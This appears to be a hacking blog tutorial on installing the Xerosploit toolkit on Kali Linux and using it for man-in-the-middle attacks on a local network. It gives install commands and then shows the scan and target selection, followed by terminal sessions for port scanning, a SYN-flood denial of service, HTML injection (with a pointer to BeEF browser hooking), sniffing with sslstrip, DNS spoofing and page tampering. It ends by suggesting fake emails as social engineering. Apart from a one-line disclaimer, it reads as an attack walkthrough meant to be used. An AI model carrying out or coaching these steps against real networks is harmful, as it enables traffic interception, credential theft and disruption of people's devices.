Sploitech

How To Do Man In The Middle Attacks Using Xerosploit Toolkit

xerosploit

About Xerosploit

Xerosploit is a penetration testing toolkit whose goal is to perform man-in-the-middle attacks for testing purposes. It brings various modules that allow to realize efficient attacks, and also allows to carry out denial of service attacks and port scanning. Powered by bettercap and nmap.

Features

  • Port scanning
  • Network mapping
  • Dos attack
  • Html code injection
  • Javascript code injection
  • Download interception and replacement
  • Sniffing
  • DNS spoofing
  • Background audio reproduction
  • Images replacement
  • Drifnet
  • Webpage defacement and more …

Tools & Software Required:

  • One System Capable Of Running Kali Linux. (You can also use virtual machines to perform the hack)
  • One host machine of your own to be hacked.
  • Xerosploit

Installing Dependencies:

First, we need to install the dependencies which are needed to run xerosploit. These are the dependencies that are needed by xerosploit:

  • Nmap
  • hping3
  • build-essential
  • ruby-dev
  • libpcap-dev
  • libgmp3-dev
  • tabulate
  • terminaltables

Copy and paste the command given below to install the necessary dependencies:

				
					sudo apt-get update
sudo apt-get install nmap hping3 build-essential ruby-dev libgmp3-dev libpcap-dev -y
git clone https://github.com/Robpol86/terminaltables.git
cd terminaltables && sudo python setup.py install
git clone https://github.com/astanin/python-tabulate.git
cd python-tabulate && sudo python setup.py install
				
			

Installing Xerosploit:

After installing dependencies clone the xerosploit files from Github. To clone files, copy and paste the command given below:

				
					git clone https://github.com/LionSec/xerosploit
cd xerosploit && sudo python install.py
				
			

When the setup starts select your operating system and press enter:

				
					┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                     Xerosploit Installer                     █
█                                                              █
└══════════════════════════════════════════════════════════════┘

[++] Please choose your operating system.

1) Ubuntu / Kali linux / Others
2) Parrot OS

>>> 1

[++] Installing Xerosploit ...
Hit:1 http://http.re4son-kernel.com/re4son kali-pi InRelease
Hit:2 http://ftp.harukasan.org/kali kali-rolling InRelease
Hit:3 http://ftp.harukasan.org/kali kali-experimental InRelease
Reading package lists... Done
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Package python-pip is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
However the following packages replace it:
  python3-pip

E: Package 'python-pip' has no installation candidate
WARNING:  bin/xettercap is not executable
WARNING:  See https://guides.rubygems.org/specification-reference/ for help
  Successfully built RubyGem
  Name: xettercap
  Version: 1.5.7xerob
  File: xettercap-1.5.7xerob.gem
Successfully installed xettercap-1.5.7xerob
Parsing documentation for xettercap-1.5.7xerob
Done installing documentation for xettercap after 2 seconds
1 gem installed
Xerosploit has been successfully installed. Execute 'xerosploit' in your terminal.
				
			

Now the xerosploit is installed successfully. To run xerosploit 

Type: xerosploit

				
					kali@kali:~$ sudo xerosploit
[sudo] password for kali: 
Traceback (most recent call last):
  File "/opt/xerosploit/xerosploit.py", line 27, in <module>
    from tabulate import tabulate
ImportError: No module named tabulate
				
			

If you are having an error while running xerosploit. You have to install terminaltables and tabulate copy and paste the commands given below to correctly install it:

				
					git clone https://github.com/Robpol86/terminaltables.git
cd terminaltables && sudo python setup.py install

git clone https://github.com/astanin/python-tabulate.git
cd python-tabulate && sudo python setup.py install
				
			

Now the xerosploit starts without any error

				
					kali@kali:~$ sudo xerosploit


        ▄  ▄███▄   █▄▄▄▄ ████▄    ▄▄▄▄▄   █ ▄▄  █     ████▄ ▄█    ▄▄▄▄▀
    ▀▄   █ █▀   ▀  █  ▄▀ █   █   █     ▀▄ █   █ █     █   █ ██ ▀▀▀ █
      █ ▀  ██▄▄    █▀▀▌  █   █ ▄  ▀▀▀▀▄   █▀▀▀  █     █   █ ██     █
     ▄ █   █▄   ▄▀ █  █  ▀████  ▀▄▄▄▄▀    █     ███▄  ▀████ ▐█    █
    █   ▀▄ ▀███▀     █                     █        ▀        ▐   ▀
     ▀              ▀                       ▀


[+]═══════════[ Author : @LionSec1 _-\|/-_ Website: www.neodrix.com ]═══════════[+]

                      [ Powered by Bettercap and Nmap ]

┌═════════════════════════════════════════════════════════════════════════════┐
█                                                                             █
█                         Your Network Configuration                          █
█                                                                             █
└═════════════════════════════════════════════════════════════════════════════┘

╒══════════════╤═══════════════════╤═════════════╤═════════╤════════════╕
│  IP Address  │    MAC Address    │   Gateway   │  Iface  │  Hostname  │
╞══════════════╪═══════════════════╪═════════════╪═════════╪════════════╡
├──────────────┼───────────────────┼─────────────┼─────────┼────────────┤
│ 192.168.1.5  │ B8:27:EB:29:5B:BF │ 192.168.1.1 │  wlan0  │    kali    │
╘══════════════╧═══════════════════╧═════════════╧═════════╧════════════╛

╔═════════════╦════════════════════════════════════════════════════════════════════╗
║             ║ XeroSploit is a penetration testing toolkit whose goal is to       ║
║ Information ║ perform man in the middle attacks for testing purposes.            ║
║             ║ It brings various modules that allow to realise efficient attacks. ║
║             ║ This tool is Powered by Bettercap and Nmap.                        ║
╚═════════════╩════════════════════════════════════════════════════════════════════╝

[+] Please type 'help' to view commands.

Xero ➮
				
			

Mapping Our Network

Now to start a Man In The Middle Attack you will have to be connected to the network on which your target is connected.

If you want to know how to hack WiFi check out our article on:  

After you are connected to the target network you have to scan for the target IP address.

				
					Xero ➮ help

╔══════════╦════════════════════════════════════════════════════════════════╗
║          ║                                                                ║
║          ║ scan     :  Map your network.                                  ║                                                                                 
║          ║                                                                ║                                                                                 
║          ║ iface    :  Manually set your network interface.               ║                                                                                 
║ COMMANDS ║                                                                ║                                                                                 
║          ║ gateway  :  Manually set your gateway.                         ║                                                                                 
║          ║                                                                ║                                                                                 
║          ║ start    :  Skip scan and directly set your target IP address. ║                                                                                 
║          ║                                                                ║                                                                                 
║          ║ rmlog    :  Delete all xerosploit logs.                        ║                                                                                 
║          ║                                                                ║                                                                                 
║          ║ help     :  Display this help message.                         ║                                                                                 
║          ║                                                                ║                                                                                 
║          ║ exit     :  Close Xerosploit.                                  ║                                                                                 
║          ║                                                                ║                                                                                 
╚══════════╩════════════════════════════════════════════════════════════════╝

[+] Please type 'help' to view commands.                                                                                                                      
                                                                                                                                                              
Xero ➮ 
				
			

To start mapping the network Type: scan

These all the devices shown below are mine. Do Not Do This To Hack Anyone.

				
					Xero ➮ scan

[++] Mapping your network ...                                                                                                                                 
                                                                                                                                                              
[+]═══════════[ Devices found on your network ]═══════════[+]
                                                                                                                                                              
╔═════════════╦═══════════════════╦════════════════════════════╗
║ IP Address  ║ Mac Address       ║ Manufacturer               ║
╠═════════════╬═══════════════════╬════════════════════════════╣
║ 192.168.1.1 ║ 24:0B:88:AE:18:20 ║ (Unknown)                  ║
║ 192.168.1.2 ║ E0:13:B5:73:59:E3 ║ (vivo MobileCommunication) ║
║ 192.168.1.3 ║ E0:CC:F8:40:8B:E6 ║ (Xiaomi Communications)    ║
║ 192.168.1.6 ║ 98:48:27:D8:21:48 ║ (Tp-link Technologies)     ║
║ 192.168.1.7 ║ EA:A4:2A:21:CF:86 ║ (Unknown)                  ║
║ 192.168.1.5 ║ E4:5F:01:0A:D6:9E ║ (This device)              ║
║             ║                   ║                            ║
╚═════════════╩═══════════════════╩════════════════════════════╝

[+] Please choose a target (e.g. 192.168.1.10). Enter 'help' for more information.                                                                            
                                                                                                                                                              
Xero ➮ 192.168.1.6

				
			

Now select the target IP address. I am targeting (Tp-link Technologies).

				
					Xero ➮ 192.168.1.6

[++] 192.168.1.6 has been targeted.                                                                                                                           

[+] Which module do you want to load ? Enter 'help' for more information.
Xero»modules ➮
				
			

Choosing The Right Attack

After selecting the target it will ask you which attack you want to perform on the target. Type help if you want to see the complete attack list.

				
					Xero»modules ➮ help

╔═════════╦══════════════════════════════════════════════════════════════════════╗
║         ║                                                                      ║
║         ║ pscan       :  Port Scanner                                          ║                                                                            
║         ║                                                                      ║                                                                            
║         ║ dos         :  DoS Attack                                            ║                                                                            
║         ║                                                                      ║                                                                            
║         ║ ping        :  Ping Request                                          ║                                                                            
║         ║                                                                      ║                                                                            
║         ║ injecthtml  :  Inject Html code                                      ║                                                                            
║         ║                                                                      ║                                                                            
║         ║ injectjs    :  Inject Javascript code                                ║                                                                            
║         ║                                                                      ║                                                                            
║         ║ rdownload   :  Replace files being downloaded                        ║                                                                            
║         ║                                                                      ║                                                                            
║         ║ sniff       :  Capturing information inside network packets          ║                                                                            
║ MODULES ║                                                                      ║                                                                            
║         ║ dspoof      :  Redirect all the http traffic to the specified one IP ║                                                                            
║         ║                                                                      ║                                                                            
║         ║ yplay       :  Play background sound in target browser               ║                                                                            
║         ║                                                                      ║                                                                            
║         ║ replace     :  Replace all web pages images with your own one        ║                                                                            
║         ║                                                                      ║                                                                            
║         ║ driftnet    :  View all images requested by your targets             ║                                                                            
║         ║                                                                      ║                                                                            
║         ║ move        :  Shaking Web Browser content                           ║                                                                            
║         ║                                                                      ║                                                                            
║         ║ deface      :  Overwrite all web pages with your HTML code           ║                                                                            
║         ║                                                                      ║                                                                            
╚═════════╩══════════════════════════════════════════════════════════════════════╝

[+] Which module do you want to load ? Enter 'help' for more information.                                                                                     
                                                                                                                                                              
Xero»modules ➮ 
				
			

You can select any attack which you want to use on the target. In some cases, the attack might not work if the target is using a VPN. The table given below shows a clear view of what you can do with all the types of attacks:

pscanScans for the open ports on the target IP
dosUses hping3 (DNS flood attack) and makes the target internet & pc unresponsive
pingChecks if the server or device is up or not
injecthtmlInject HTML code in all visited webpage
injectjsInject javascript code in all visited webpage
rdownloadReplace files being downloaded
sniffCapturing information inside network packets
dspoofRedirect all the HTTP traffic to the specified one IP
moveShaking Web Browser content
defaceOverwrite all web pages with your HTML code

Attack 1: Open Port Scanning

Let’s try out the first attack port scanner. It will scan for open ports on network computers and retrieve versions of programs running on the detected ports. Want to know more about this check out our article on:

				
					Xero»modules ➮ pscan   
 
┌══════════════════════════════════════════════════════════════┐                                                                                              
█                                                              █                                                                                              
█                         Port Scanner                         █                                                                                              
█                                                              █                                                                                              
█      Find open ports on network computers and retrieve       █                                                                                              
█     versions of programs running on the detected ports       █                                                                                              
└══════════════════════════════════════════════════════════════┘                                                                                              

[+] Enter 'run' to execute the 'pscan' command.                                                                                                               
                                                                                                                                                              
Xero»modules»pscan ➮ run

[++] Please wait ... Scanning ports on 192.168.1.1                                                                                                            
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.

[+]═════════[ Port scan result for 192.168.1.1 ]═════════[+]                                                                                                  
                                                                                                                                                              
╔═════════╦═════════╦═══════╗
║ SERVICE ║ PORT    ║ STATE ║
╠═════════╬═════════╬═══════╣
║ HTTP    ║ 80/TCP  ║ OPEN  ║
║ HTTPS   ║ 443/TCP ║ OPEN  ║
║         ║         ║       ║
╚═════════╩═════════╩═══════╝

				
			

Now we can see that the port 80 & 443 are open on the target device. If you want to go back to menu Type: back

				
					Xero»modules»pscan ➮ back
				
			

Attack 2: DoS

Now let’s try to dos the target system by sending a syn request to the target to make the system unresponsive to legitimate traffic

				
					Xero»modules ➮ dos
 
┌══════════════════════════════════════════════════════════════┐                                                                                              
█                                                              █                                                                                              
█                          DoS Attack                          █                                                                                              
█                                                              █                                                                                              
█    Send a succession of SYN requests to a target's system    █                                                                                              
█    to make the system unresponsive to legitimate traffic     █                                                                                              
└══════════════════════════════════════════════════════════════┘                                                                                              

[+] Enter 'run' to execute the 'dos' command.                                                                                                                 
                                                                                                                                                              
Xero»modules»dos ➮ run

[++] Performing a DoS attack to 192.168.1.6 ...                                                                                                               
                                                                                                                                                              
[++] Press 'Ctrl + C' to stop.                                                                                                                                
                                                                                                                                                              
HPING 192.168.1.6 (wlan0 192.168.1.6): S set, 40 headers + 120 data bytes
hping in flood mode, no replies will be shown

				
			

On the target pc, I tried to run the google speed test many times but it keeps failing. After I stopped the attack it started to load.

Dos Attack

Attack 3: Html Injection

Now let’s try Html injection. I am skipping ping because it’s not an attack and it’s very basic. While running the injecthtml you have to enter the path of your HTML file. You can also use BeEF (The Browser Exploitation Framework Project) to hook the browser of the target when he/she is going to visit an unsecured website.

				
					Xero»modules ➮ injecthtml
 
┌══════════════════════════════════════════════════════════════┐                                                                                              
█                                                              █                                                                                              
█                         Inject Html                          █                                                                                              
█                                                              █                                                                                              
█           Inject Html code in all visited webpage            █                                                                                              
└══════════════════════════════════════════════════════════════┘                                                                                              

[+] Enter 'run' to execute the 'injecthtml' command.                                                                                                          
                                                                                                                                                              
Xero»modules»injecthtml ➮ run

[+] Specify the file containing html code you would like to inject.                                                                                           
                                                                                                                                                              
Xero»modules»Injecthtml ➮ /home/kali/sample.html

[++] Injecting Html code ...                                                                                                                                  

[++] Press 'Ctrl + C' to stop .

				
			

Whenever the target visits any unsecured website then your HTML code is going to be injected.

Attack 4: Packet Sniffing

Now we are going to capture some valuable information from the network packets like which website does user visit. To start sniffing Type: sniff

In the attack, it will ask you if you want to load sslstrip, which will attempt to downgrade traffic so that we can pick up some interesting information that we might otherwise lose.

				
					Xero»modules ➮ sniff
 
┌══════════════════════════════════════════════════════════════┐                                                                                              
█                                                              █                                                                                              
█                           Sniffing                           █                                                                                              
█                                                              █                                                                                              
█      Capturing any data passed over your local network       █                                                                                              
└══════════════════════════════════════════════════════════════┘                                                                                              

[+] Please type 'run' to execute the 'sniff' command.                                                                                                         
                                                                                                                                                              
Xero»modules»sniff ➮ run

[+] Do you want to load sslstrip ? (y/n).                                                                                                                     
                                                                                                                                                              
Xero»modules»sniff ➮ y

[++] All logs are saved on : /opt/xerosploit/xerosniff                                                                                                        

[++] Sniffing on 192.168.1.6                                                                                                                                  

[++] sslstrip : ON                                                                                                                                            

[++] Press 'Ctrl + C' to stop .

				
			

When the attack starts a new window will pop up in which you are going to see the websites which the target visit

Attack 5: DNS Spoofing

In this attack, whenever the target opens any secured or unsecured website, he will see your website instead of the original content, and the URL will be of the site user requested.

				
					Xero»modules ➮ dspoof
 
┌══════════════════════════════════════════════════════════════┐                                                                                              
█                                                              █                                                                                              
█                         DNS spoofing                         █                                                                                              
█                                                              █                                                                                              
█   Supply false DNS information to all target browsed hosts   █                                                                                              
█     Redirect all the http traffic to the specified one IP    █                                                                                              
└══════════════════════════════════════════════════════════════┘                                                                                              

[+] Enter 'run' to execute the 'dspoof' command.                                                                                                              
                                                                                                                                                              
Xero»modules»dspoof ➮ run

[+] Enter the IP address where you want to redirect the traffic.                                                                                              
                                                                                                                                                              
Xero»modules»dspoof ➮ 192.168.1.5

[++] Redirecting all the traffic to 192.168.1.5 ...                                                                                                           

[++] Press 'Ctrl + C' to stop . 

				
			

Attack 6: Shaking The Target Browser

In this attack, whenever the target visits any unsecured website, a javascript file is going to be injected that will make his browsers shaking.

				
					Xero»modules ➮ move 
 
┌══════════════════════════════════════════════════════════════┐                                                                                              
█                                                              █                                                                                              
█                           Shakescreen                        █                                                                                              
█                                                              █                                                                                              
█                   Shaking Web Browser content                █                                                                                              
└══════════════════════════════════════════════════════════════┘                                                                                              

[+] Enter 'run' to execute the 'move' command.                                                                                                                
                                                                                                                                                              
Xero»modules»shakescreen ➮ run

[++] Injecting shakescreen.js  ...                                                                                                                            

[++] Press 'Ctrl + C' to stop . 

				
			

Attack 7: Replacing All Images

In this attack, whenever the target visits any unsecured website, all the images will be replaced with your chosen image.

Try Out Its Other Modules

yplayPlay a YouTube video in the background of browsers
injectjsInject JavaScript into websites loaded by others on the network
pingChecks if the server or device is up or not
rdownloadReplace files being downloaded with your own.
defaceSwap out every webpage with your own HTML
rdownloadReplace files being downloaded
driftnetView all images requested by your targets

Conclusion

These types of attacks are not 100% successful and they can only be used against unsecured websites which do not use SSL. Many people avoid going to not-secure websites these days and are using VPN. So these attacks cannot be successful fully without social engineering like sending fake mail in which the user might be interested.

Liked This Article? Join Our Newsletter.

It’s Free! Get exclusive access to new tips, articles, guides, updates, and more.

Share It On:

Share on facebook
Facebook
Share on whatsapp
WhatsApp
Share on reddit
Reddit
Share on telegram
Telegram
Share on email
Email

COMMENTS:

Leave a Reply

Your email address will not be published. Required fields are marked *

You Might Also Like:

Want To Know About Latest Hacking Tricks?

It’s Free! Get exclusive access to new tips, articles, guides, updates, and more.